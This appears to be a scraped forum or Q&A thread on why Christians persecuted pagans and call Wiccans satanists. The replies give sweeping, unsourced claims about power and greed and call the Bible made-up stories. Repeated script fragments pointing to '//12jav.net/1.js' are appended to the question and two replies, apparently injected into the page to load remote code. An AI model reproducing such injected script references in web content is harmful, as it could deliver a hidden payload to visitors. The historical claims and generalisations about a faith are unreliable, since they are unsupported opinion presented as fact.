why did they try so hard to bury the pegan religion thats always bothered me and why do they treat all other religions like there evil then go around slaughtering them in history. im so confused on that why did they want no one to be a part of that religion. and why do they spread vicious rumors of how wiccans worship satan and are evil. even tho the sub group known as catholics murdered and tortured pegans till they died or converted? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
From what I know, they did it for political power and didn't want anyone to challenge them.
Midwives, herbalists and other knowledgeable people were killed as they were seen as a threat to their rise to power. It was about greed, wealth, ownership of land and control of the masses etc.
Those people who held knowledge were accused of Satan worshiping so they had a reason to be killed from those "higher up". If there was only ignorant people or those too afraid to question their authority, then getting power over people was easy, especially when every one else was too scared to rebel.
But, hey, that's what I know and there may be other reasons too.

no they did it because paganism thretened their power.

In the begining a group of people found their god (yawn)
and they wanted to spead the word of as best described "IT"
and the only way the could was to denounce all religions but their's. They did this by creating a book (bible) to prove their words which was filled with stories they made up to ensare worshipers (must be the work of demons lol) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
although they hated and hurt pagans in the past and sometimes still now we have to remember not to fill ourselves w/ hate cuz that will just waste our time and effort on people that aren't even important to us sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
